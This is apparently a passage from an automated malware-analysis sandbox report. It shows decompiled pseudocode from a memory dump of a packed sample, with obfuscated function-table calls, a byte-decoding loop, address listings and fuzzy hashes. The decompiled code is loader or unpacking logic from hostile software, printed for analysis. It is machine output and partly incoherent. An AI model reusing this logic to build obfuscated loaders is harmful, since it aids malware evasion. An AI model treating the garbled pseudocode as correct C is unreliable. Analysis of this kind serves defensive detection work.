				_t223 =  *((intOrPtr*)(_t261 + 0x41f068))( *(_t369 - 0x20), _t340,  *(_t369 - 0x24), _t286);
				 *(_t369 - 0x20) = _t358;
				 *(_t261 + 0x41c2a8) =  *(_t261 + 0x41c2a8) & 0x00000000;
				 *(_t261 + 0x41c2a8) =  *(_t261 + 0x41c2a8) ^ _t358 & 0x00000000 ^ _t223;
				_t318 =  *_t374;
				_t375 =  &(_t374[1]);
				 *(_t369 - 0x1c) = _t223;
				 *(_t369 - 0x14) =  *(_t369 - 0x14) & 0x00000000;
				 *(_t369 - 0x14) =  *(_t369 - 0x14) | _t223 ^  *(_t369 - 0x1c) ^ _t318;
				_t130 = _t261 + 0x41ccc7; // 0x41ccc7
				 *(_t369 - 0x24) = 0;
				 *_t375 =  *_t375 | _t130;
				_t228 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t369 - 0x24));
				 *(_t261 + 0x41cca4) =  *(_t261 + 0x41cca4) & 0x00000000;
				 *(_t261 + 0x41cca4) =  *(_t261 + 0x41cca4) | _t340 -  *_t375 | _t228;
				_t343 = _t340;
				_t363 =  *(_t369 - 0x20) & 0x00000000 ^ _t261 & 0x00000000 ^  *(_t369 + 8);
				_t264 = _t261;
				_t139 = _t264 + 0x41c550; // 0x41c550
				 *(_t369 - 0x20) = 0;
				 *_t375 =  *_t375 + _t139;
				_t230 =  *((intOrPtr*)(_t264 + 0x41f060))( *(_t369 - 0x20));
				 *(_t369 - 0x20) = 0;
				 *_t375 =  *_t375 + _t230;
				_t145 = _t264 + 0x41d34c; // 0x41d34c
				 *_t375 = _t145;
				_t232 =  *((intOrPtr*)(_t264 + 0x41f060))( *(_t369 - 0x20),  *(_t369 - 0x20));
				_t376 = _t375 - 0xfffffffc;
				 *_t148 = _t232;
				 *(_t369 - 0x24) =  *(_t369 - 0x24) + (0 ^  *_t375);
				_push( *(_t369 - 0x24));
				_pop(_t233);
				_t320 = _t318;
				 *(_t369 - 0x1c) = _t320;
				_t323 =  *(_t369 - 0x1c);
				if( *((intOrPtr*)(_t264 + 0x41ccf8)) > _t233) {
					_t155 = _t264 + 0x41c550; // 0x41c550
					 *(_t369 - 0x1c) =  *(_t369 - 0x1c) & 0x00000000;
					 *_t376 =  *_t376 + _t155;
					_t159 = _t264 + 0x41d34c; // 0x41d34c
					 *(_t369 - 0x1c) =  *(_t369 - 0x1c) & 0x00000000;
					 *_t376 =  *_t376 + _t159;
					_t233 =  *((intOrPtr*)(_t264 + 0x41f064))( *(_t369 - 0x1c),  *(_t369 - 0x1c));
				}
				 *(_t369 - 0x24) = _t323;
				 *((intOrPtr*)(_t264 + 0x41ce46)) = _t233;
				_t326 =  *(_t369 - 0x24);
				 *(_t369 - 0x1c) = _t326;
				_t169 = _t264 + 0x41cb9d; // 0x41cb9d
				 *_t376 =  *_t376 - _t363;
				 *_t376 =  *_t376 | _t169;
				_t170 = _t264 + 0x41cd17; // 0x41cd17
				 *(_t369 - 0x20) =  *(_t369 - 0x20) & 0x00000000;
				 *_t376 =  *_t376 | _t170;
				_t236 =  *((intOrPtr*)(_t264 + 0x41f068))( *(_t369 - 0x20), _t363);
				 *_t376 = _t343 & 0x00000000 | _t326 & 0x00000000 ^ _t363;
				 *(_t264 + 0x41d015) = 0 ^ _t236;
				_t348 = 0;
				_t364 = _t363 - 1;
				 *(_t369 - 0x1c) = 0;
				_push( *(_t369 - 0x1c));
				 *_t376 =  *_t376 | _t264;
				do {
					 *_t178 = _t348;
					_t293 =  *(_t369 - 0x20);
					_t294 = _t293 &  *(_t369 - 8);
					if(_t294 == 0) {
						_t364 = _t364 + 1;
						_t236 = _t236 & 0x00000000 ^ (_t348 -  *_t376 |  *(_t369 - 0x18));
						_t348 = _t348;
						_t264 =  *(_t236 + _t364) & 0x000000ff;
					}
					 *_t184 =  *((intOrPtr*)(_t369 - 0xc));
					_t330 =  *(_t369 - 0x20);
					asm("rol edx, cl");
					asm("lodsb");
					_t236 = _t236 | _t330 & _t264;
					 *_t348 = _t236;
					_t348 = _t348 + 1;
					_t186 = _t369 - 4;
					 *_t186 =  *((intOrPtr*)(_t369 - 4)) - 1;
				} while ( *_t186 != 0);
				_t266 =  *_t376;
				_t377 =  &(_t376[1]);
				_t188 = _t266 + 0x41cc0b; // 0x41cc0b
				 *_t377 =  *_t377 & 0x00000000;
				 *_t377 =  *_t377 ^ _t188;
				_t189 = _t266 + 0x41cbd0; // 0x41cbd0
				 *_t377 =  *_t377 & 0x00000000;
				 *_t377 =  *_t377 | _t189;
				_t240 =  *((intOrPtr*)(_t266 + 0x41f068))(_t369, _t294);
				 *(_t369 - 0x20) = _t294;
				 *(_t266 + 0x41d326) =  *(_t266 + 0x41d326) & 0x00000000;
				 *(_t266 + 0x41d326) =  *(_t266 + 0x41d326) ^ (_t294 ^  *(_t369 - 0x20) | _t240);
				 *(_t369 - 0x1c) = _t266;
				return memcpy(_t348, _t364 + 1,  *(_t369 - 0x14));
			}

0x022743d8
0x022743d8
0x022743df
0x022743e2
0x022743e5
0x022743eb
0x022743f2
0x022743f5
0x022743fe
0x022743ff
0x02274402
0x02274405
0x02274411
0x02274414
0x02274417
0x0227441e
0x0227441f
0x02274422
0x02274423
0x02274430
0x02274432
0x02274435
0x0227443e
0x02274442
0x0227444c
0x02274450
0x02274453
0x02274453
0x0227445b
0x02274462
0x02274468
0x0227446d
0x02274473
0x0227447c
0x0227447f
0x02274486
0x0227448a
0x02274493
0x02274494
0x02274497
0x0227449a
0x022744a0
0x022744a7
0x022744ad
0x022744b4
0x022744b7
0x022744bd
0x022744c5
0x022744cc
0x022744d2
0x022744d5
0x022744dc
0x022744e2
0x022744e9
0x022744ec
0x022744f2
0x022744fa
0x02274501
0x02274507
0x0227450a
0x02274511
0x02274517
0x0227451e
0x02274521
0x02274528
0x0227452b
0x0227452e
0x02274534
0x0227453c
0x02274543
0x02274549
0x02274549
0x02274551
0x02274555
0x02274558
0x0227455b
0x02274562
0x02274565
0x02274568
0x02274571
0x02274574
0x0227457a
0x02274584
0x02274587
0x02274593
0x02274596
0x02274599
0x022745a0
0x022745a1
0x022745a4
0x022745b2
0x022745b4
0x022745b7
0x022745b9
0x022745bf
0x022745c9
0x022745cc
0x022745d2
0x022745dc
0x022745df
0x022745e5
0x022745ec
0x022745f2
0x022745f2
0x022745fe
0x02274603
0x0227460d
0x02274611
0x02274614
0x0227461a
0x02274621
0x02274624
0x0227462b
0x0227462e
0x02274631
0x0227463d
0x02274644
0x0227464a
0x02274654
0x02274657
0x0227465b
0x0227465f
0x02274662
0x02274668
0x02274672
0x02274675
0x02274681
0x02274688
0x0227468e
0x02274695
0x02274698
0x022746a1
0x022746a5
0x022746af
0x022746b2
0x022746b9
0x022746bc
0x022746bf
0x022746c5
0x022746cf
0x022746d2
0x022746d8
0x022746e0
0x022746e7
0x022746f2
0x022746f5
0x022746f8
0x02274700
0x02274704
0x0227470a
0x02274710
0x0227471a
0x0227471d
0x02274729
0x02274730
0x02274736
0x02274741
0x02274743
0x02274744
0x0227474a
0x02274754
0x02274757
0x0227475d
0x02274767
0x0227476a
0x02274773
0x02274776
0x02274781
0x02274788
0x0227478b
0x0227478e
0x02274791
0x02274792
0x02274793
0x022747a0
0x022747a5
0x022747a7
0x022747ad
0x022747b4
0x022747b7
0x022747bd
0x022747c4
0x022747c7
0x022747c7
0x022747cd
0x022747d4
0x022747da
0x022747dd
0x022747ed
0x022747f4
0x022747f7
0x022747fa
0x02274800
0x02274807
0x0227480a
0x02274812
0x02274819
0x0227481f
0x02274820
0x02274821
0x02274828
0x0227482b
0x0227482e
0x0227482f
0x02274835
0x02274836
0x02274839
0x0227483b
0x02274846
0x02274848
0x02274849
0x02274849
0x02274850
0x02274856
0x02274857
0x0227485b
0x0227485c
0x0227485e
0x02274860
0x02274861
0x02274861
0x02274861
0x02274868
0x0227486b
0x0227486e
0x02274875
0x02274879
0x0227487c
0x02274883
0x02274887
0x0227488a
0x02274890
0x02274898
0x0227489f
0x022748a8
0x022748c1

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950c55eab0a1380bd81bf2ad2fa2bd8a9b0f1be257dd98b9728846acfec3c26f
Instruction ID: 0d3f359e856a82412d4df8039277255793c3fd508035729b9e10a41a85c383cb
Opcode Fuzzy Hash: 950c55eab0a1380bd81bf2ad2fa2bd8a9b0f1be257dd98b9728846acfec3c26f
Instruction Fuzzy Hash: 250223728442088FEF04DFA4C88A7EEBBF1FF48310F19856ED889AA149D7385515CF69

Uniqueness

Uniqueness Score: -1.00%

Function 02275A25, Relevance: .3, Instructions: 281
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E02275A25(signed int __ebx, void* __ecx, signed int __edx, intOrPtr* __edi, signed int __esi) {
				signed int _t406;
				signed int _t409;
				intOrPtr _t411;
				signed int _t413;
				void* _t415;
				signed int _t416;
				signed int _t419;
				signed int _t424;
				signed int _t430;
				void* _t431;
				signed int _t435;
				void* _t437;
				intOrPtr _t438;
				intOrPtr _t441;
				signed int _t443;
				void* _t444;
				signed int _t446;
				signed int _t451;
				signed int _t453;
				signed int _t456;
				signed int _t459;
				signed int _t463;
				void* _t465;
				void* _t466;
				signed int _t469;
				signed int _t474;
				signed int _t479;
				void* _t480;
				signed int _t482;
				void* _t484;
				signed int _t485;
				intOrPtr _t490;
				signed int _t491;
				signed int _t493;
				void* _t495;
				signed int _t496;
				signed int _t500;
				void* _t502;
				signed int _t503;
				signed int _t506;
				signed int _t509;
				intOrPtr _t512;
				signed int _t520;
				signed int _t522;
				void* _t523;
				signed int _t532;
				signed int _t535;
				signed int _t538;
				signed int _t540;
				signed int _t543;
				void* _t545;
				void* _t547;
				signed int _t551;
				signed int _t553;
				void* _t554;
				signed int _t559;
				signed int _t561;
				void* _t564;
				signed int _t566;
				signed int _t568;
				signed int _t574;
				void* _t577;
				signed int _t580;
				signed int _t583;
				signed int _t585;
				signed int _t588;
				signed int _t590;
				signed int _t592;
				signed int _t594;
				signed int _t597;
				signed int _t601;
				signed int _t604;
				signed int _t607;
				signed int _t610;
				signed int _t613;
				signed int _t616;
				signed int _t619;
				signed int _t622;
				void* _t625;
				signed int _t629;
				signed int _t631;
				signed int _t634;
				signed int _t637;
				signed int _t642;
				signed int _t645;
				signed int _t648;
				void* _t651;
				signed int _t653;
				void* _t654;
				signed int _t656;
				signed int _t664;
				signed int _t665;
				signed int _t668;
				void* _t669;
				signed int _t671;
				signed int _t672;
				signed int _t675;
				signed int _t678;
				signed int _t681;
				signed int _t692;
				signed int _t695;
				signed int _t696;
				signed int _t704;
				void* _t705;
				signed int _t707;
				signed int* _t717;
				signed int* _t718;
				signed int* _t719;
				signed int* _t720;
				signed int* _t721;
				signed int* _t722;
				signed int* _t723;
				signed int* _t724;

				_t640 = __edi;
				_t597 = __edx;
				_t532 = __ebx;
				_push(__edi);
				 *_t717 =  *_t717 & 0x00000000;
				 *_t717 =  *_t717 + __ebx + 0x41c13d;
				_t406 =  *((intOrPtr*)(__ebx + 0x41f060))();
				 *(_t704 - 0x14) = __esi;
				 *(__ebx + 0x41c112) = 0 ^ _t406;
				_t664 =  *(_t704 - 0x14);
				while(1) {
					L15:
					_t721[1] =  *_t675;
					_t540 = _t538;
					 *_t721 =  *_t721 ^ _t675;
					 *_t721 =  *_t721 ^ _t540 + 0x0041d099;
					_t453 =  *((intOrPtr*)(_t540 + 0x41f060))(_t704);
					 *_t721 = _t574;
					 *(_t540 + 0x41c24c) = 0 ^ _t453;
					_t577 = 0;
					 *_t276 = _t675;
					 *_t721 =  *_t721 & 0x00000000;
					 *_t721 =  *_t721 + _t540 + 0x41cdd2;
					 *_t721 =  *_t721 & 0x00000000;
					 *_t721 =  *_t721 | _t540 + 0x0041c846;
					_t456 =  *((intOrPtr*)(_t540 + 0x41f068))(_t704, _t645);
					 *(_t704 - 0x10) = _t616;
					 *(_t540 + 0x41c9fe) = 0 ^ _t456;
					_t619 =  *(_t704 - 0x10);
					 *(_t704 - 0xc) =  *(_t704 - 0xc) & 0x0000ffff;
					 *_t721 =  *_t721 ^ _t619;
					 *_t721 =  *_t721 | _t540 + 0x0041c9e4;
					 *_t721 =  *_t721 & 0x00000000;
					 *_t721 =  *_t721 ^ _t540 + 0x0041c746;
					_t459 =  *((intOrPtr*)(_t540 + 0x41f068))(_t619, _t619);
					 *(_t704 - 0x14) = _t619;
					 *(_t540 + 0x41c559) =  *(_t540 + 0x41c559) & 0x00000000;
					 *(_t540 + 0x41c559) =  *(_t540 + 0x41c559) ^ (_t619 ^  *(_t704 - 0x14) | _t459);
					_t622 =  *(_t704 - 0x14);
					while(1) {
						 *(_t704 - 0x10) = _t540;
						_t543 =  *(_t704 - 0x10);
						_t299 = _t543 + 0x41cb0b; // 0x41cb0b
						 *(_t704 - 0x14) = 0;
						 *_t721 =  *_t721 | _t299;
						_t463 =  *((intOrPtr*)(_t543 + 0x41f060))( *(_t704 - 0x14));
						 *_t721 = _t463;
						_t304 = _t543 + 0x41cda5; // 0x41cda5
						 *_t721 = _t304;
						_t465 =  *((intOrPtr*)(_t543 + 0x41f060))( *(_t704 - 0x14),  *(_t704 - 0x10));
						_t722 = _t721 - 0xfffffffc;
						 *_t722 =  *_t722 ^ _t704;
						_t705 = _t465;
						_t466 = _t705 +  *_t721;
						_t707 = 0;
						 *(_t707 - 0x14) = _t675;
						_t580 =  *(_t543 + 0x41c96a);
						_t678 =  *(_t707 - 0x14);
						if(_t580 > _t466) {
							_t310 = _t543 + 0x41cb0b; // 0x41cb0b
							 *_t722 =  *_t722 & 0x00000000;
							 *_t722 =  *_t722 | _t310;
							_t311 = _t543 + 0x41cda5; // 0x41cda5
							 *(_t707 - 0x14) =  *(_t707 - 0x14) & 0x00000000;
							 *_t722 =  *_t722 | _t311;
							_t466 =  *((intOrPtr*)(_t543 + 0x41f064))( *(_t707 - 0x14), _t707);
						}
						 *_t316 = _t466;
						 *_t318 =  *(_t707 - 0x10);
						_t722[1] =  *(_t707 - 0xc);
						_t545 = _t543;
						_t321 = _t545 + 0x41cee2; // 0x41cee2
						 *_t722 = _t321;
						_t323 = _t545 + 0x41d33a; // 0x41d33a
						 *(_t707 - 0x14) = 0;
						 *_t722 =  *_t722 | _t323;
						_t469 =  *((intOrPtr*)(_t545 + 0x41f068))( *(_t707 - 0x14),  *(_t707 - 0x10), _t580);
						 *(_t545 + 0x41d1da) =  *(_t545 + 0x41d1da) & 0x00000000;
						 *(_t545 + 0x41d1da) =  *(_t545 + 0x41d1da) | _t678 -  *_t722 | _t469;
						_t681 = _t678;
						 *(_t707 - 0x10) = _t645;
						_t648 =  *(_t707 - 0x10);
						 *_t722 =  *_t722 - _t622;
						 *_t722 =  *_t722 ^ (_t469 & 0x00000000 | _t645 ^  *(_t707 - 0x10) |  *(_t707 - 4));
						_t335 = _t545 + 0x41d2b3; // 0x41d2b3
						 *_t722 =  *_t722 - _t622;
						 *_t722 = _t335;
						_t336 = _t545 + 0x41cb87; // 0x41cb87
						 *(_t707 - 0x10) =  *(_t707 - 0x10) & 0x00000000;
						 *_t722 =  *_t722 + _t336;
						_t474 =  *((intOrPtr*)(_t545 + 0x41f068))( *(_t707 - 0x10), _t622, _t622);
						 *(_t707 - 0x10) = _t580;
						 *(_t545 + 0x41cf9a) =  *(_t545 + 0x41cf9a) & 0x00000000;
						 *(_t545 + 0x41cf9a) =  *(_t545 + 0x41cf9a) | _t580 ^  *(_t707 - 0x10) | _t474;
						_t583 =  *(_t707 - 0x10);
						_t723 =  &(_t722[1]);
						 *(_t707 - 0x10) = 0;
						 *_t723 =  *_t723 ^  *_t722;
						_t350 = _t545 + 0x41c922; // 0x41c922
						 *(_t707 - 0x10) = 0;
						 *_t723 =  *_t723 | _t350;
						_t353 = _t545 + 0x41c97d; // 0x41c97d
						 *_t723 =  *_t723 & 0x00000000;
						 *_t723 =  *_t723 + _t353;
						_t479 =  *((intOrPtr*)(_t545 + 0x41f068))(_t583,  *(_t707 - 0x10),  *(_t707 - 0x10));
						 *(_t545 + 0x41cae1) =  *(_t545 + 0x41cae1) & 0x00000000;
						 *(_t545 + 0x41cae1) =  *(_t545 + 0x41cae1) | _t707 & 0x00000000 | _t479;
						_t704 = _t707;
						_t480 =  *((intOrPtr*)(_t545 + 0x41f050))();
						 *(_t704 - 0x14) = 0;
						 *_t723 =  *_t723 + _t480;
						_t362 = _t545 + 0x41c197; // 0x41c197
						 *(_t704 - 0x14) = 0;
						 *_t723 =  *_t723 | _t362;
						_t482 =  *((intOrPtr*)(_t545 + 0x41f060))( *(_t704 - 0x14),  *(_t704 - 0x14));
						 *(_t704 - 0x14) = 0;
						 *_t723 =  *_t723 | _t482;
						_t368 = _t545 + 0x41c46f; // 0x41c46f
						 *(_t704 - 0x14) = 0;
						 *_t723 =  *_t723 ^ _t368;
						_t484 =  *((intOrPtr*)(_t545 + 0x41f060))( *(_t704 - 0x14),  *(_t704 - 0x14));
						_pop( *_t372);
						_t585 = (_t583 & 0x00000000) +  *(_t704 - 0x10);
						 *_t374 = _t484;
						 *(_t704 - 0x14) =  *(_t704 - 0x14) + _t585;
						_push( *(_t704 - 0x14));
						_pop(_t485);
						_t547 = _t545;
						 *(_t704 - 0x10) = _t648;
						_t574 = _t585 & 0x00000000 ^ _t648 -  *(_t704 - 0x10) ^  *(_t547 + 0x41c9d0);
						_t645 =  *(_t704 - 0x10);
						if(_t574 > _t485) {
							_t382 = _t547 + 0x41c197; // 0x41c197
							 *_t723 =  *_t723 & 0x00000000;
							 *_t723 =  *_t723 + _t382;
							_t383 = _t547 + 0x41c46f; // 0x41c46f
							 *(_t704 - 0x10) = 0;
							 *_t723 =  *_t723 ^ _t383;
							_t485 =  *((intOrPtr*)(_t547 + 0x41f064))( *(_t704 - 0x10), _t681);
							 *(_t547 + 0x41cfe1) =  *(_t547 + 0x41cfe1) & 0x00000000;
							 *(_t547 + 0x41cfe1) =  *(_t547 + 0x41cfe1) | _t704 ^  *_t723 ^ _t485;
							_t704 = _t704;
						}
						_t721 =  &(_t723[1]);
						 *_t721 =  *_t721 ^ _t704;
						 *_t721 = _t681;
						 *_t721 = _t485 & 0x00000000 |  *_t723;
						_t490 = 0;
						 *_t721 = _t622;
						 *((intOrPtr*)( *((intOrPtr*)(_t704 - 8)))) = _t490;
						_t625 = 0;
						 *_t392 = _t704;
						 *_t721 = 4;
						_t491 = _t547;
						 *_t394 = 0 ^  *(_t704 - 0x14);
						 *(_t704 - 0x14) =  *(_t704 - 0x14) + _t491;
						_t675 =  *(_t704 - 0x14);
						_t616 = _t625;
						 *_t399 =  *((intOrPtr*)(_t704 - 8));
						 *(_t704 - 0x10) =  *(_t704 - 0x10) + _t491;
						 *_t403 =  *(_t704 - 0x10);
						_t538 = _t547;
						if( *_t675 != 0) {
							goto L9;
						}
						L21:
						_t640 = _t645 + 0x14;
						_t664 = _t675;
						if( *_t640 != 0 ||  *(_t640 + 0x10) != 0) {
							if( *_t640 != 0) {
								 *_t23 =  *_t640;
								_t665 =  *(_t704 - 0x14);
								_t25 = _t532 + 0x41d32a; // 0x41d32a
								 *_t717 =  *_t717 & 0x00000000;
								 *_t717 =  *_t717 ^ _t25;
								_t26 = _t532 + 0x41cdb4; // 0x41cdb4
								 *_t717 =  *_t717 ^ _t704;
								 *_t717 = _t26;
								_t409 =  *((intOrPtr*)(_t532 + 0x41f068))(_t704, _t704);
								 *(_t532 + 0x41cada) =  *(_t532 + 0x41cada) & 0x00000000;
								 *(_t532 + 0x41cada) =  *(_t532 + 0x41cada) | _t597 & 0x00000000 ^ _t409;
								_t597 = _t597;
							} else {
								_t6 = _t538 + 0x41d076; // 0x41d076
								 *(_t704 - 0x10) = 0;
								 *_t721 =  *_t721 | _t6;
								_t520 =  *((intOrPtr*)(_t538 + 0x41f060))( *(_t704 - 0x10));
								 *(_t704 - 0x14) = _t664;
								 *(_t538 + 0x41d0ee) = 0 ^ _t520;
								_push( *(_t640 + 0x10));
								_pop( *_t14);
								_push( *(_t704 - 0x10));
								_pop(_t665);
								_t16 = _t538 + 0x41c2b0; // 0x41c2b0
								 *_t721 = _t16;
								_t522 =  *((intOrPtr*)(_t538 + 0x41f060))( *(_t704 - 0x10));
								 *(_t538 + 0x41c1b3) =  *(_t538 + 0x41c1b3) & 0x00000000;
								 *(_t538 + 0x41c1b3) =  *(_t538 + 0x41c1b3) | _t704 ^  *_t721 | _t522;
								_t704 = _t704;
							}
							_t601 =  *_t717;
							 *_t717 =  *(_t640 + 0x10);
							_t34 = _t532 + 0x41c661; // 0x41c661
							 *_t717 =  *_t717 ^ _t704;
							 *_t717 =  *_t717 + _t34;
							_t411 =  *((intOrPtr*)(_t532 + 0x41f060))(_t597);
							 *_t717 = _t665;
							 *((intOrPtr*)(_t532 + 0x41d31e)) = _t411;
							_t668 = 0;
							 *_t37 = _t704;
							_t38 = _t532 + 0x41c5b3; // 0x41c5b3
							 *_t717 = _t38;
							_t413 =  *((intOrPtr*)(_t532 + 0x41f060))( *(_t704 - 0x10));
							 *(_t704 - 0x14) =  *(_t704 - 0x14) & 0x00000000;
							 *_t717 =  *_t717 ^ _t413;
							_t44 = _t532 + 0x41c868; // 0x41c868
							 *_t717 =  *_t717 & 0x00000000;
							 *_t717 =  *_t717 ^ _t44;
							_t415 =  *((intOrPtr*)(_t532 + 0x41f060))( *(_t704 - 0x14));
							 *_t46 = _t640;
							_t551 = 0 ^  *(_t704 - 0x10);
							 *_t48 = _t415;
							 *(_t704 - 0x14) =  *(_t704 - 0x14) + _t551;
							_push( *(_t704 - 0x14));
							_pop(_t416);
							_t642 = _t640;
							 *(_t704 - 0x14) = _t416;
							_t553 = _t551 & 0x00000000 ^ _t416 & 0x00000000 ^  *(_t532 + 0x41c633);
							_t419 =  *(_t704 - 0x14);
							if(_t553 > _t419) {
								_t55 = _t532 + 0x41c5b3; // 0x41c5b3
								 *_t717 = _t55;
								_t57 = _t532 + 0x41c868; // 0x41c868
								 *(_t704 - 0x10) =  *(_t704 - 0x10) & 0x00000000;
								 *_t717 =  *_t717 | _t57;
								_t419 =  *((intOrPtr*)(_t532 + 0x41f064))( *(_t704 - 0x10),  *(_t704 - 0x14));
							}
							 *(_t704 - 0x10) = _t601;
							 *(_t532 + 0x41c2a0) =  *(_t532 + 0x41c2a0) & 0x00000000;
							 *(_t532 + 0x41c2a0) =  *(_t532 + 0x41c2a0) | _t601 & 0x00000000 ^ _t419;
							_t604 =  *(_t704 - 0x10);
							 *(_t704 - 0x10) = _t532;
							_t535 =  *(_t704 - 0x10);
							 *_t717 =  *_t717 & 0x00000000;
							 *_t717 =  *_t717 | _t419 & 0x00000000 | _t532 & 0x00000000 ^  *(_t704 + 8);
							_t71 = _t535 + 0x41c812; // 0x41c812
							 *_t717 =  *_t717 & 0x00000000;
							 *_t717 =  *_t717 + _t71;
							_t72 = _t535 + 0x41ca65; // 0x41ca65
							 *_t717 =  *_t717 & 0x00000000;
							 *_t717 =  *_t717 | _t72;
							_t424 =  *((intOrPtr*)(_t535 + 0x41f068))(_t553, _t668);
							 *(_t704 - 0x14) = _t642;
							 *(_t535 + 0x41d25f) =  *(_t535 + 0x41d25f) & 0x00000000;
							 *(_t535 + 0x41d25f) =  *(_t535 + 0x41d25f) ^ (_t642 -  *(_t704 - 0x14) | _t424);
							_t645 =  *(_t704 - 0x14);
							 *_t81 = _t553;
							 *_t717 =  *_t717 ^ _t668;
							_push( *((intOrPtr*)(_t704 - 8)));
							_pop(_t669);
							 *((intOrPtr*)(_t704 - 8)) = _t669 +  *(_t704 - 0x10);
							_t671 = 0;
							_t85 = _t535 + 0x41d15d; // 0x41d15d
							 *_t717 =  *_t717 - _t553;
							 *_t717 = _t85;
							_t86 = _t535 + 0x41c260; // 0x41c260
							 *(_t704 - 0x10) = 0;
							 *_t717 =  *_t717 | _t86;
							_push( *((intOrPtr*)(_t535 + 0x41f068))( *(_t704 - 0x10), _t553));
							_pop( *_t90);
							_push( *(_t704 - 0x10));
							_pop( *_t92);
							_push( *((intOrPtr*)(_t645 + 0xc)));
							_pop( *_t94);
							_push( *(_t704 - 0x14));
							_pop(_t554);
							 *_t717 =  *_t717 & 0x00000000;
							 *_t717 =  *_t717 + _t554;
							_t96 = _t535 + 0x41ca52; // 0x41ca52
							 *_t717 =  *_t717 - _t535;
							 *_t717 =  *_t717 + _t96;
							_t430 =  *((intOrPtr*)(_t535 + 0x41f060))(_t535, _t535);
							 *(_t704 - 0x14) = _t604;
							 *(_t535 + 0x41cd09) =  *(_t535 + 0x41cd09) & 0x00000000;
							 *(_t535 + 0x41cd09) =  *(_t535 + 0x41cd09) | _t604 -  *(_t704 - 0x14) ^ _t430;
							_t607 =  *(_t704 - 0x14);
							_t718 = _t717 - 0xfffffffc;
							_push(0);
							 *_t718 =  *_t718 | _t430;
							_push( *_t717);
							_pop(_t431);
							 *_t718 = _t431 +  *(_t704 + 8);
							_t107 = _t535 + 0x41c07f; // 0x41c07f
							 *_t718 = _t107;
							_t435 =  *((intOrPtr*)(_t535 + 0x41f060))( *(_t704 - 0x10),  *(_t704 - 0x14));
							 *_t718 =  *_t718 - _t607;
							 *_t718 =  *_t718 | _t435;
							_t110 = _t535 + 0x41d248; // 0x41d248
							 *(_t704 - 0x14) =  *(_t704 - 0x14) & 0x00000000;
							 *_t718 =  *_t718 | _t110;
							_t437 =  *((intOrPtr*)(_t535 + 0x41f060))( *(_t704 - 0x14), _t607);
							_t559 =  *_t718;
							_t719 =  &(_t718[1]);
							 *(_t704 - 0x10) = _t535;
							_push(_t559 + _t437);
							_t538 =  *(_t704 - 0x10);
							_pop(_t438);
							_t561 = _t559 & 0x00000000 ^ _t607 -  *_t719 ^  *(_t538 + 0x41d0e6);
							_t610 = _t607;
							if(_t561 > _t438) {
								_t118 = _t538 + 0x41c07f; // 0x41c07f
								 *(_t704 - 0x14) =  *(_t704 - 0x14) & 0x00000000;
								 *_t719 =  *_t719 + _t118;
								_t122 = _t538 + 0x41d248; // 0x41d248
								 *(_t704 - 0x14) = 0;
								 *_t719 =  *_t719 | _t122;
								_t438 =  *((intOrPtr*)(_t538 + 0x41f064))( *(_t704 - 0x14),  *(_t704 - 0x14));
								 *(_t704 - 0x10) = _t671;
								 *((intOrPtr*)(_t538 + 0x41cd68)) = _t438;
								_t671 =  *(_t704 - 0x10);
							}
							_pop( *_t129);
							 *_t719 = _t561 & 0x00000000 ^  *(_t704 - 0x10);
							_t564 = _t671;
							_t672 = _t564 +  *(_t704 + 8);
							_t566 = 0;
							 *_t719 =  *_t719 & 0x00000000;
							 *_t719 =  *_t719 | _t566;
							_t132 = _t538 + 0x41d135; // 0x41d135
							 *_t719 = _t132;
							_t134 = _t538 + 0x41c60e; // 0x41c60e
							 *_t719 =  *_t719 & 0x00000000;
							 *_t719 =  *_t719 | _t134;
							_t441 =  *((intOrPtr*)(_t538 + 0x41f068))(_t566,  *(_t704 - 0x10), _t438);
							 *(_t704 - 0x14) = _t610;
							 *((intOrPtr*)(_t538 + 0x41c3e6)) = _t441;
							_t613 =  *(_t704 - 0x14);
							_t568 =  *_t719;
							_t720 = _t719 - 0xfffffffc;
							 *_t720 =  *_t720 - _t613;
							 *_t720 =  *_t720 ^ _t568;
							_t139 = _t538 + 0x41c220; // 0x41c220
							 *(_t704 - 0x14) = 0;
							 *_t720 =  *_t720 + _t139;
							_t443 =  *((intOrPtr*)(_t538 + 0x41f060))( *(_t704 - 0x14), _t613);
							 *(_t704 - 0x10) = _t568;
							 *(_t538 + 0x41cf1d) =  *(_t538 + 0x41cf1d) & 0x00000000;
							 *(_t538 + 0x41cf1d) =  *(_t538 + 0x41cf1d) ^ (_t568 ^  *(_t704 - 0x10) | _t443);
							_t444 =  *((intOrPtr*)(_t538 + 0x41f054))();
							 *(_t704 - 0x14) = 0;
							 *_t720 =  *_t720 + _t444;
							_t153 = _t538 + 0x41c49b; // 0x41c49b
							 *(_t704 - 0x10) = 0;
							 *_t720 =  *_t720 + _t153;
							_t446 =  *((intOrPtr*)(_t538 + 0x41f060))( *(_t704 - 0x10),  *(_t704 - 0x14));
							 *(_t704 - 0x14) = _t672;
							 *(_t538 + 0x41c8aa) =  *(_t538 + 0x41c8aa) & 0x00000000;
							 *(_t538 + 0x41c8aa) =  *(_t538 + 0x41c8aa) | _t672 & 0x00000000 ^ _t446;
							_t675 =  *(_t704 - 0x14);
							_t721 = _t720 - 0xfffffffc;
							 *(_t704 - 0x10) = _t613;
							 *(_t704 - 4) =  *(_t704 - 4) & 0x00000000;
							 *(_t704 - 4) =  *(_t704 - 4) ^ _t613 -  *(_t704 - 0x10) ^ _t446 & 0x00000000 ^  *_t720;
							_t616 =  *(_t704 - 0x10);
							_t170 = _t538 + 0x41c279; // 0x41c279
							 *_t721 = _t170;
							_t172 = _t538 + 0x41d1ea; // 0x41d1ea
							 *_t721 =  *_t721 - _t675;
							 *_t721 = _t172;
							_t451 =  *((intOrPtr*)(_t538 + 0x41f068))(_t675,  *(_t704 - 0x14));
							 *(_t704 - 0x14) =  *(_t704 - 0x10);
							 *(_t538 + 0x41cbc5) = 0 ^ _t451;
							_t574 =  *(_t704 - 0x14);
							goto L9;
						}
						 *_t721 =  *_t721 ^ _t491;
						_t523 = _t491;
						return _t523;
						L9:
						if(( *_t675 & 0x80000000) != 0) {
							goto L15;
						} else {
							_t179 = _t538 + 0x41c8e1; // 0x41c8e1
							 *_t721 =  *_t721 - _t616;
							 *_t721 =  *_t721 | _t179;
							_t493 =  *((intOrPtr*)(_t538 + 0x41f060))(_t616);
							 *(_t704 - 0x10) = 0;
							 *_t721 =  *_t721 | _t493;
